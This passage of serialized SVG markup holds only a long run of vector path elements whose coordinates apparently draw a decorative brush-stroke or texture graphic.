d=\"M744.4,18.9c1.4.2,2.3.4,3.2.6.3-.4-.8-.8-3.5-1.4C745.7,18.7,747.1,19,744.4,18.9Z\"></path>\n        <path d=\"M736.1,17.6a10.11,10.11,0,0,1,3,.3c1,0,.8-.3,1.8-.3a17.84,17.84,0,0,1-3.3-.8c-1.9-.1.6.4,1.3.8C738.3,17.6,732.9,16.9,736.1,17.6Z\"></path>\n        <path d=\"M874.1,39.7c.6-.5-1.7-1.3.4-1.3-2-.1-9.5-1.1-5.8,0C871.1,38.4,872.5,39.3,874.1,39.7Z\"></path>\n        <path d=\"M819.1,29.6c-1-.2-2.1-.3-3.1-.5,1.1.4.6.7,2.4,1.1-.3-.3,1.1-.1.8-.3a10.32,10.32,0,0,1-2.2-.5A12.34,12.34,0,0,0,819.1,29.6Z\"></path>\n        <path d=\"M745.7,17.5c-.4.2,2.1,1.1,3.4,1-1.9-.3-2.5-.6-2.3-.8,1.4.2,2.3.4,3.2.6C749.7,17.8,747.5,17.7,745.7,17.5Z\"></path>\n        <path d=\"M1115.1,77.7a10.78,10.78,0,0,0-1.8-.2c.2,0,.5.1.7.1,3,.6,7.3,1.9,1.6.7.1.4,5,1.1,6.5,1.5-.3-.4-2.6-.9-3.5-1.4C1118.1,78.7,1116.6,78.1,1115.1,77.7Z\"></path>\n        <path d=\"M759.6,18.2c1.6.2,3.9.7,4.1.6-1.9-.3-2.5-.6-2.3-.8-6.8-1.3-6.8-1.5-12.8-2.6-1.4-.2.1.4-1.9.1-1.7-.4,1.5-.5-3.5-1.4,3.4,1.5.5,1.8,3.2,2.8,0-.2,4,.7,5.3,1-.3-.6,4.8,0,.4-1.2,3.8.6,7.8.9,9.5,1.7C760.8,18.3,759.6,18,759.6,18.2Z\"></path>\n        <path d=\"M909.6,43c.9.1,2,.3,3.1.4,2.4.3,4.3.5.8-.2a1.67,1.67,0,0,1-.8.1c-.7-.1-1.3-.4-.3-.4a19.06,19.06,0,0,0-3.1-.4,10.32,10.32,0,0,1,2.2.5C910.2,42.8,909.4,42.8,909.6,43Z\"></path>\n        <path d=\"M849.5,32.8c-.4-.5,4.6.3,5,0-1.6-.5-2.5-.3-3.2-.6-1.1-.7,3.4-.1,1.5-.9a7.46,7.46,0,0,1-2.1-.3C851.5,31.8,848.9,32.2,849.5,32.8Z\"></path>\n        <path d=\"M763.1,17.3c-1.2-.2-1.2-.4-1.2-.5-4.4-.6-3.1-1-6.5-1.5C755.9,15.7,761.8,17.1,763.1,17.3Z\"></path>\n        <path d=\"M737.2,11.7c-1.9-.1-.3.7,1.5,1.1C735.7,11.8,741.3,12.5,737.2,11.7Z\"></path>\n        <path d=\"M740.4,12.3c.6.1,1.2.2,1.1.3,3.5.7.6-.3,4.1.5,1.4.4.5.7,2.5,1.2-1.4-.6,1.5,0,1.9-.1-2.3-.4-.7-.5-1.3-.8a64.57,64.57,0,0,0,7.3,1.2c-2.4-.8.3-1-1.6-1.3-1.7-.1,0,.8-4.9-.1.8,0,1.2-.1.8-.4-3.6-.5-8.2-.8-5.8,0-2.9-.5-2.2-.6-4.2-.7A.3.3,0,0,1,740.4,12.3Z\"></path>\n        <path d=\"M757.6,13.9c-2.3-.1,1.2.9,2.6,1.4C761.8,15.4,758.3,14.4,757.6,13.9Z\"></path>\n        <path d=\"M876.6,33.6c-.5-.1-1.2-.3-1.6-.4a8.65,8.65,0,0,0,1.6.2c2.7.4,4.9.4,3.4-.1-1.1-.1-2.2-.1-3.3-.2-1.4-.1-2.9-.2-4.7-.4,1.2.3,3.2.6,4.6.9.2.2.5.2.7.3S877,33.8,876.6,33.6Z\"></path>\n        <path d=\"M747.1,12.1c4.4.7,2.2-.1.7-.5-2.5-.3-4.5-1.1-5.3-.9C746.2,11.3,748.6,12,747.1,12.1Z\"></path>\n        <path d=\"M895.6,29.6c.7-.7,0-1-2.9-2,.9.6,1.1.6-.7.7C899,29.4,890.9,28.7,895.6,29.6Z\"></path>\n        <path d=\"M865.9,23.9c-1.3-.8,3.2-1.1-3.1-2.5C866.6,22.6,861.7,22.6,865.9,23.9Z\"></path>\n        <path d=\"M880.3,21.7c0,.3,1.8.6,2.4,1-3.9-.6,1,.7-3-.3,2.9.8-1.5.5,1.6,1.3,0-.1.1-.1,1,.1.6.1,1.2.2,1,.1-1.2-.2-1.2-.4-1.2-.5,3.6.8,3.9.7,4.1.5,2.3.5,6.3,1,5.5,1.4,4.2.5,5.2.1,7.8.2-4.9-.8-4.2-.1-9.1-.8.8-.3-5.9-1-5.5-1.4-.2-.6,4.5.7,4,.2-.3-.4-3.3-.3-3.2-.6,3.4.4-2.3-.7-1.3-.8.6.1,3.9.4,4.2.7s-1.3,0-1.9,0c1.8.3,3.3.6,4.2.8-.4-.5.6-1.1-5-2.4-2.4-.1,1.7.5,1.3.8-4.2-.4-5.9-.8-3.3-.9-4.3-.7-3.4,0-.7.7a10.11,10.11,0,0,0-3-.3c1.2.2,3,.5,3.2.6s-.7.2-1.9,0c-1.3-.4-2.8-.8-4.4-1.2l-1.1-.3c-.9-.1-.1.3,1.1.6C878.1,21.3,879.6,21.7,880.3,21.7Z\"></path>\n        <path d=\"M876.4,21.6c-3.5-.5-6.6-.9-7.1-.6C871.9,21.2,875.2,21.7,876.4,21.6Z\"></path>\n        <path d=\"M886,15.3c-.7-.5-4.2-1.5.5-1-5.9-.9-4.2-1.4-6.8-2.1-5.6-.6,6.1,2.1-.3,1.4-.2-.2-.5-.3-2.2-.6h0c-.9.4,2.4,2-5.4.9,3.8,1,3.7,1.2-.7.7,2.4.4,4.4.6,6,.8a21.86,21.86,0,0,0,4.2.2c.2.2,3.5.7,3.3.9a25.55,25.55,0,0,0-2.9.1c1.8.3,3.3.6,4.3.8.7-.2-1.6-.6-1.3-.8,1.5.3,1.9.5,3.3.8.5-.3-2.5-.8-2.5-1.2a39.07,39.07,0,0,1,4.3.9c-1.9.3,7.6,2.4,4,2.3,4.3.5,1.1-.5,2.6-.6-.7-.3-5-.8-5.4-1.1-.1-.1-.1-.2-.2-.4a35.54,35.54,0,0,1,7.5,1.6c2.3.1-3.2-1-3.5-1.4,1.1,0,.6-.4,4,.2,2.1.5,5,1.1,6.6,1.6-2.4-.4-4-.7-5.3-1-.4.6,3.5.7,4.5,1.3.2.5-1.3.4-2.7.4,1.2.2,3,.5,3.2.6-5.1.3-1.7,2.6-7.4,2.9-1.2-.2-1.2-.4-1.2-.5a37.31,37.31,0,0,0-4.1-.5c2.8.7,7.2,1.6,10.8,2.3.5.6-3.5-.6-4-.2,2.6.7,5.1.8,8.4,1.4-3.3-1,.3-.8-3.7-1.7-1.1-.1-.1.4-3-.2a37.58,37.58,0,0,1,6,.3c-1.3-.6-1.5-1.2-.6-1.2,2,.1,2.1.4,4.3.8.6-.4-5.1-1.1-4.5-1.4,2,.3,3.5.5,4.1.5-7.2-1.1,4.7,0-1.6-1.3-1.4-.1-.2.5-2.9.1-.7-.8,2.7-.4,4.6-.5-1.2-.2-3-.5-3.2-.6,4.4.3-.8-1.2,2.1-1.6-4.9-.8-2.2-.7-2.4-1.1-3.3-.6-3-.3-6.2-.9,1.9.8-.5.1-4-.2-1.6-1-6.6-2.2-10.2-3.3C886.2,14.4,889.8,15.6,886,15.3Z\"></path>\n        <path d=\"M911.8,26.9c.9.1-.1-.3,1.4-.1.5.1,1.3.2,2.6.4,0,.2.5.5,1.2.4,0-.2-.6-.3-1.2-.5-1.1-.2-1.9-.3-2.6-.4a25.93,25.93,0,0,1-3.7-.6C909.8,26.3,908.7,26.5,911.8,26.9Z\"></path>\n        <path d=\"M869,18.1c3.1.5,7.9,1,6.1.6-1.9-.2-2.7-.2-5.1-.5-.2-.2,0-.4-2.3-.7C867.6,17.7,869,17.9,869,18.1Z\"></path>\n        <path d=\"M889.3,20.3a19.07,19.07,0,0,0,2,.2,2.71,2.71,0,0,0,1.2.4c0-.5,1.8-.6-3.7-1.6C890.9,20,889.2,20.2,889.3,20.3Z\"></path>\n        <path d=\"M876,16.6c-3.7-.6-3.1-.1-5-.3a18.2,18.2,0,0,0,3.1.5C871.2,16.2,877.4,17.2,876,16.6Z\"></path>\n        <path d=\"M913.4,17.7c1.3.3.8.4,0,.3a12.05,12.05,0,0,0-1.9,0,7.14,7.14,0,0,0,1.9.2,10.53,10.53,0,0,1,3.3.5,10.36,10.36,0,0,0-2-.2c6.7.9,1.3-.3,2.6-.6a24.13,24.13,0,0,0-3.8-.4,4.87,4.87,0,0,1-1.2-.1C912.7,17.5,913.1,17.6,913.4,17.7Z\"></path>\n        <path d=\"M870.1,10.2c3.7.9-.8.5,4.5,1.4-.4-.3-2.3-.8-.3-.7C872,10.7,870.2,9.9,870.1,10.2Z\"></path>\n        <path d=\"M874.2,10.7c1.2.2,2.1.5,3,.7,1.2.3,2.5.6,4.5,1-.1-.2-.1-.3-.2-.5-1.1-.2-3.1-.5-4.3-.7-.6-.1-1-.2-1-.3a1.56,1.56,0,0,0,1-.1.18.18,0,0,0,0-.27h0a2.37,2.37,0,0,0-1.4-.5C873.5,9.9,877.5,11.1,874.2,10.7Z\"></path>\n        <path d=\"M879.6,9.8a7.46,7.46,0,0,0-2.1-.3c1.2.3,7.4,1.8,6.5,1.4-3-.6-.4-.6.8-.4a15.73,15.73,0,0,1-3.3-.8C879.6,9.5,883.1,10.3,879.6,9.8Z\"></path>\n        <path d=\"M910.2,11a12.17,12.17,0,0,1,3.4.4,41,41,0,0,0,4.9.9c-.2-.3-2.7-.8-4.9-1.1S909.6,10.6,910.2,11Z\"></path>\n        <path d=\"M928.2,103.9c-3.3-.6-1.9,0-5.1-.6-1-.6,1.3-.2.7-.7-.5-.2-4.4-1.2-5.3-1,3.5.8.2.7.5,1.1a17.84,17.84,0,0,1,3.3.8C922.3,103,929.9,104.9,928.2,103.9Z\"></path>\n        <path d=\"M761.4,34.5c3,.4,3.2.4,6.3,1l-.3-.6c-2.8-.7-3.6-.5-5.3-1,.2-.2,1.7,0,4.1.5a12.72,12.72,0,0,0-4.7-1.7C762.7,33.6,758.4,33.2,761.4,34.5Z\"></path>\n        <path d=\"M824.9,41.9c0-.1.8,0,1.1.2a2.71,2.71,0,0,0,1.2.4c-.1-.7,3.2.1,4.7-.2-4.6-.9-5.8-.8-8.3-1.2C824.2,41.4,822.6,41.5,824.9,41.9Z\"></path>\n        <path d=\"M818.7,34.9c-4.2-.4-.4.7,1.5,1.3a7.45,7.45,0,0,1-2-.1c-1.7-.4,0-.5-3.4-1,1.5,1,.4,1-.3,1.4,4.3.2,6,1.2,9.4,1.6-3.5-.8,6.1.5,1.7-.5-1.7-.1-4.3-1.2-2.5-1.2-1.5-.5-3.8-.5-4.3-.8-1.6-.7,1.9-.2,4,.3a49.92,49.92,0,0,0-8.7-2.1C813.7,34,818.2,34.5,818.7,34.9Z\"></path>\n        <path d=\"M793.3,30.3c-8.2-1.2-3.4.8-4.1,1.5a7.13,7.13,0,0,1,3,.5c-3.3-.1,2.2,1.6,2,2.1.9-.4,2.2-1.1-1-2,2.7.3,1.8-.1.7-.6,1.8.3,3.3.6,4.3.8a36.07,36.07,0,0,0-8-2.5C791.9,30.3,793.9,30.7,793.3,30.3Z\"></path>\n        <path d=\"M1701.8,92.1c1.7-.2,3.8-.5,1.8-1h-1.7c-3.4.2.2,1.2-7.4.6,2.7.7,4.2.9,1.4,1.6,5.8.2,4.8-.3,6-.5.1,0,.2-.1.4-.1h-.4C1699.1,92.5,1700.2,92.3,1701.8,92.1Z\"></path>\n        <path d=\"M1676,91.4c-3.6-.4,0-.6-6.3-.8C1670.3,90.9,1671.3,91.2,1676,91.4Z\"></path>\n        <path d=\"M1697.2,91.7c1-.3,4.5-.5-.8-.9C1697.5,91.1,1692.8,91.4,1697.2,91.7Z\"></path>\n        <path d=\"M1669.2,85.2a66.58,66.58,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C1675.3,84.8,1673.1,85.2,1669.2,85.2Z\"></path>\n        <path d=\"M1676.8,84.4c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C1675.7,84.6,1681.1,84.6,1676.8,84.4Z\"></path>\n        <path d=\"M1649.6,83.4c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C1645.7,83.6,1649.2,83.6,1649.6,83.4Z\"></path>\n        <path d=\"M1653.4,81.5c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C1646,81.2,1649.8,81.7,1653.4,81.5Z\"></path>\n        <path d=\"M1663,81.3c-2.6.1-6.4,0-6.7.3C1661,81.8,1663,81.7,1663,81.3Z\"></path>\n        <path d=\"M1656.4,80.1a37.64,37.64,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C1656.5,80.7,1654.9,80.5,1656.4,80.1Z\"></path>\n        <path d=\"M1697.3,80.8c-.4.3-7.1.6.8.9C1695.7,81.3,1701.4,81.1,1697.3,80.8Z\"></path>\n        <path d=\"M1689.9,77.1c.2-1.1,1.6-1.1,3.6-2.2-7.2-.1-7.7,0-2.4.5-2.7-.1-3,.1-5.6,0C1690.9,76,1683.8,76.9,1689.9,77.1Z\"></path>\n        <path d=\"M1695.3,73.8c-5.3,0-4.4.6-6.1,1C1695.7,74.8,1694.2,74.2,1695.3,73.8Z\"></path>\n        <path d=\"M1424,67c-5.6-.2-1.5,1.4-.4,1.1C1423.5,67.5,1423.1,67.5,1424,67Z\"></path>\n        <path d=\"M1644.3,71.1c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C1647.2,71,1647.7,71.2,1644.3,71.1Z\"></path>\n        <path d=\"M1448.2,66.1c0-.4,1.8-.7,1.8-1.2C1446.3,65,1444.3,66.1,1448.2,66.1Z\"></path>\n        <path d=\"M1696.8,70.8c.2-.4,2.6-1-1.3-1.4C1695.3,69.9,1691.7,70.2,1696.8,70.8Z\"></path>\n        <path d=\"M1473.3,64.6c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C1481.5,64.8,1475.4,64.4,1473.3,64.6Z\"></path>\n        <path d=\"M1460.1,63.8c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5-3.4.1-6.2-.5-7.1-.2,2.2.2,4.2.6,2,.7C1458.2,63.7,1459.1,63.8,1460.1,63.8Z\"></path>\n        <path d=\"M1642.1,67c-.6.5,7.3.4,10,.3C1648.7,67,1645.1,67.3,1642.1,67Z\"></path>\n        <path d=\"M1649.2,64c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C1645.6,64.4,1649.5,64.4,1649.2,64Z\"></path>\n        <path d=\"M1656.6,64.6c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C1657,65,1660.6,64.8,1656.6,64.6Z\"></path>\n        <path d=\"M1647.3,63.5c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C1639.7,63.1,1645,63.2,1647.3,63.5Z\"></path>\n        <path d=\"M1499.7,58.4c4.8.2,7.4-.4,2.2-.6C1500.1,57.8,1501.6,58.3,1499.7,58.4Z\"></path>\n        <path d=\"M1645.4,61.3c-1.1-.3.2-.4,4-.2-2-.2-1.5-.3-.5-.4,1.8,0,3.7.1,5.5.1-.2-.3,2.8-.2,4-.4a8.61,8.61,0,0,1-2.3-.4,20.74,20.74,0,0,0,5.1.3c1.4-.1,1.6-1.2-3.7-1.1,3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.3.1-.8.4-.4.6a27.34,27.34,0,0,0-3-.1c.2,0,.3.1.4.1-3.7-.5.4-.9,3.8-1.3-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8.9.8,2.8,1.3.3,2,1.6,0,4.4.4,5.4.3.2.1-.2.2-1.6.2h.3C1643.8,60.4,1640.9,61,1645.4,61.3Z\"></path>\n        <path d=\"M1680,59.6c1.6.5-.5.8,3.6,1-1.3-.4,1.9-.7,5.2-.4C1687.3,59.4,1683.7,60.1,1680,59.6Z\"></path>\n        <path d=\"M1695.3,59.6c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C1698.8,59.1,1696.5,59.3,1695.3,59.6Z\"></path>\n        <path d=\"M1653.3,57.7c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C1651.5,57.5,1649.1,57.5,1653.3,57.7Z\"></path>\n        <path d=\"M1602,54.7c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C1603.9,55.4,1605.1,54.8,1602,54.7Z\"></path>\n        <path d=\"M1575.4,54.4c-1-.4,3.6-.2,3.8-.5-2,0-3.2-.1-4.4-.2C1576.6,54,1570.9,54.1,1575.4,54.4Z\"></path>\n        <path d=\"M1675.5,56.1c-.4.2-5.4,0-3.9.4C1676.2,56.7,1679.4,56.3,1675.5,56.1Z\"></path>\n        <path d=\"M1647.1,55.3c-1.6-.4,3.5-.1,3.9-.3-4.4,0-3.6-.3-5.9-.4C1644.3,54.9,1644.1,55.1,1647.1,55.3Z\"></path>\n        <path d=\"M1583,53.6c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C1589.7,53.8,1581.7,53.2,1583,53.6Z\"></path>\n        <path d=\"M1509.8,50.9c1.1,0,1.8.1,2.3.1-.8.1-.5.2-1.3.3,2.4-.1,2.1.1,2.2.3s.2.3,1,.4c-5,.1-2.2.9,1.1,1.2-.1,0-.1,0-.2-.1.8.1,2.1.2,4,.3-1.8-.1-2.3-.3-2.7-.6.6,0,1.1-.1.7-.2-.9-.3-4.9-.5-2.7-.7a2.08,2.08,0,0,1,.7.1l.9-.3c1,0,.8-.1.2-.1,1.1-.6,1-1.3-4.5-1.8-4.1.2,3.1.7,2.4,1.1C1512.3,50.9,1509.9,50.8,1509.8,50.9Z\"></path>\n        <path d=\"M1654.3,54.1c-3.9-.1-5.2.5-2.1.7C1652.1,54.5,1654.3,54.4,1654.3,54.1Z\"></path>\n        <path d=\"M1687.5,55.5c.3-.4,1.3-.5-3.4-.7C1685.1,55,1682.5,55.5,1687.5,55.5Z\"></path>\n        <path d=\"M1557.1,52.6c.6-.2,3.2-.2,2.2-.6C1556.1,51.9,1552.2,52.4,1557.1,52.6Z\"></path>\n        <path d=\"M1683.5,52.6c-5-.2-2.6.8-.6.9C1685.3,53.1,1682.1,52.9,1683.5,52.6Z\"></path>\n        <path d=\"M1651.7,48c.8-.4-3.7-.6-.7-.8C1646.5,47,1647.4,48.1,1651.7,48Z\"></path>\n        <path d=\"M1700.6,46.7c1,.2-1.1.6,2,.7-.3-.1,0-.1.4-.2.9-.1,2.3-.3,0-.4C1702.5,46.8,1701.7,46.8,1700.6,46.7Z\"></path>\n        <path d=\"M1624.1,43.5c-3-.2-5.8-.4-8.8-.5C1614.6,43.3,1623.2,43.6,1624.1,43.5Z\"></path>\n        <path d=\"M1673.4,42.6c-2.2-.5,4.5-.2,5.2-.4C1674.7,41.7,1666.6,42.4,1673.4,42.6Z\"></path>\n        <path d=\"M1579.2,38.2c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C1582,38.3,1583.6,38.4,1579.2,38.2Z\"></path>\n        <path d=\"M1590.9,38.9c2,.1,2.5.2,4.4.3a4.17,4.17,0,0,1-1.1-.3c2.4,0,3.7.5,5,.2-2.4-.4-1.9-1.1-6.1-1.3a15,15,0,0,0,1.5.4C1591.1,38.2,1590.1,38.5,1590.9,38.9Z\"></path>\n        <path d=\"M1588.2,37.4c4.5.2-3,.5,3.4.7C1593.9,38,1591.6,37.2,1588.2,37.4Z\"></path>\n        <path d=\"M1648.6,87c5.3.2,13.1.2,9.6-.1C1657.6,87.4,1648.9,86.5,1648.6,87Z\"></path>\n        <path d=\"M1686.1,83.8c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6-4.6-.2-2.7.2-5.4.2-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.16,17.16,0,0,1,5.2-.4C1684.7,83.9,1685.9,84,1686.1,83.8Z\"></path>\n        <path d=\"M1684.2,80.1a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8-4.2.2-4.2-.3-5.7-.1,3.2,1,2.4,1.5-5.3,1.8C1681.7,79.6,1683.7,79.8,1684.2,80.1Z\"></path>\n        <path d=\"M1697.4,73.1c-4.4-.2-3,.7-2.3.6C1696.3,73.5,1698.9,73.5,1697.4,73.1Z\"></path>\n        <path d=\"M1646.8,72.4l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C1642.1,71.8,1644.9,72.3,1646.8,72.4Z\"></path>\n        <path d=\"M1696.6,69a24,24,0,0,0,5.8-.2h2.4c3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-1.6.1-1.6.4-3,.5-.7,0-1.8,0-3.6-.1C1699.9,68.8,1694.7,68.6,1696.6,69Z\"></path>\n        <path d=\"M1456.3,62.7c.8-.1,2.8-.1,5.5-.1a29.78,29.78,0,0,0-4.7-.7C1461.5,62.4,1452.3,62.7,1456.3,62.7Z\"></path>\n        <path d=\"M1537.7,60.5c-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2-1.7-.4,6.7-.4,2.1-.8a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3C1534.9,59.6,1535.2,60.2,1537.7,60.5Z\"></path>\n        <path d=\"M1663.5,62.9c1.9,0,3.8.1,5.7.1C1670.4,62,1668.7,62.8,1663.5,62.9Z\"></path>\n        <path d=\"M1529.9,58.1a123.6,123.6,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2-8.4-.2.9-1-5.6-1.7-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4a24.44,24.44,0,0,0-4.1-.2,1.54,1.54,0,0,0-.8-.3c.3-.1.4-.1.4-.2,2.7,0,6.8.1,9,.3-.7-.4.3-1-3.1-1.5,3.4,1.1-.1,1.2-5.9,1.1-.4-.5-3.4-1.2,2.3-1.6-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1a5.6,5.6,0,0,1,.7-.2c-5.1,1,.6,2.5-2,3.4-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4C1537.9,58.3,1532.2,58,1529.9,58.1Z\"></path>\n        <path d=\"M1508.8,54.5c-.6-.5-.4-1,3.2-1.1-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3C1512.5,53.4,1503.4,54.1,1508.8,54.5Z\"></path>\n        <path d=\"M1515,53.7c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C1518,54.2,1519.1,53.8,1515,53.7Z\"></path>\n        <path d=\"M1662.7,57.3c1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2,3.2.2-1.8.5,3.4.7C1658.9,56.8,1660.7,57.3,1662.7,57.3Z\"></path>\n        <path d=\"M1664.9,55.1c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C1666.7,54.8,1660.8,54.9,1664.9,55.1Z\"></path>\n        <path d=\"M1645.6,52c4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.5,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6.4-.2,2.8-.2,2.3-.5-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1.1,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4C1650.4,51.7,1648.9,52,1645.6,52Z\"></path>\n        <path d=\"M1614,47.7c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C1613.7,48.5,1613.3,48.1,1614,47.7Z\"></path>\n        <path d=\"M1651,45.6c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C1651.5,44,1658.2,46.5,1651,45.6Z\"></path>\n        <path d=\"M1670.6,44.2c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C1669,45.3,1671.4,44.4,1670.6,44.2Z\"></path>\n        <path d=\"M1593.1,46.2c-5.8,0-.2-.6-6.1-.6C1586.1,45.9,1593.8,46.6,1593.1,46.2Z\"></path>\n        <path d=\"M1676.8,44.9c2.8-.2.3-.7-3.5-.8C1677.4,44.4,1673.9,44.5,1676.8,44.9Z\"></path>\n        <path d=\"M1586.5,40.2c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C1588.8,39.7,1589.6,40.1,1586.5,40.2Z\"></path>\n        <path d=\"M1556.4,48.6c.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3c-.3-.7,4.2-.4,6.2-.8C1561.3,48.4,1559.8,48.6,1556.4,48.6Z\"></path>\n        <path d=\"M916.3,65.8c-.9-.6,1.5-.5,3.9.1-1-.8-3.8-.5-6.5-1.4C914.9,65.1,913.3,65.3,916.3,65.8Z\"></path>\n        <path d=\"M925.1,66a19.06,19.06,0,0,0,3.1.4c-2.7-.6,2.6.1,1.8-.4-3.6-.4-.8-.5-3.3-.9C927.8,65.9,926.1,65.9,925.1,66Z\"></path>\n        <path d=\"M920,61.2c.3-.4,1.1-.3-2.4-1.1C918.3,60.5,916.2,60.7,920,61.2Z\"></path>\n        <path d=\"M917.5,57.9c-3.7-.7-2.1.5-.6.8C918.6,58.6,916.4,58.1,917.5,57.9Z\"></path>\n        <path d=\"M949.4,62.1c-.2-.4,2.7,0,3.8-.1C948.7,61,946.5,61.3,949.4,62.1Z\"></path>\n        <path d=\"M981.6,64.9c.7-.2-3.2-1.3-4.4-1.2,2.2.4.5.6,3.2.8A3.62,3.62,0,0,0,981.6,64.9Z\"></path>\n        <path d=\"M962.6,61.5c.3-.3,3.1,0,2.7-.4C962.4,60.6,961.2,61.1,962.6,61.5Z\"></path>\n        <path d=\"M973.1,61.3c-3.2-.5-4-.4-6.1-.7a8.3,8.3,0,0,0,2.4,1C969.7,61.2,973.9,61.9,973.1,61.3Z\"></path>\n        <path d=\"M942.7,56c-.6.2-1,.9,3.7,1.7C944.9,57.1,944.5,56.6,942.7,56Z\"></path>\n        <path d=\"M936.4,54.9c-.6.3-.3.8-3.6.5,2.9.5,2,.1,4.2.7,0-.3,4.1,0,1.6-.6C937.4,55.7,938.3,55.1,936.4,54.9Z\"></path>\n        <path d=\"M987.8,63.6a23.44,23.44,0,0,0,3.5,1.4C993.1,65,992.4,64.2,987.8,63.6Z\"></path>\n        <path d=\"M1049.8,74.1a24.69,24.69,0,0,1-5.2-.8C1044.1,73.9,1053.1,74.9,1049.8,74.1Z\"></path>\n        <path d=\"M932.4,54.7c-.7-.4,4.2.1-1.4-.9C931.7,54.1,930.1,54.3,932.4,54.7Z\"></path>\n        <path 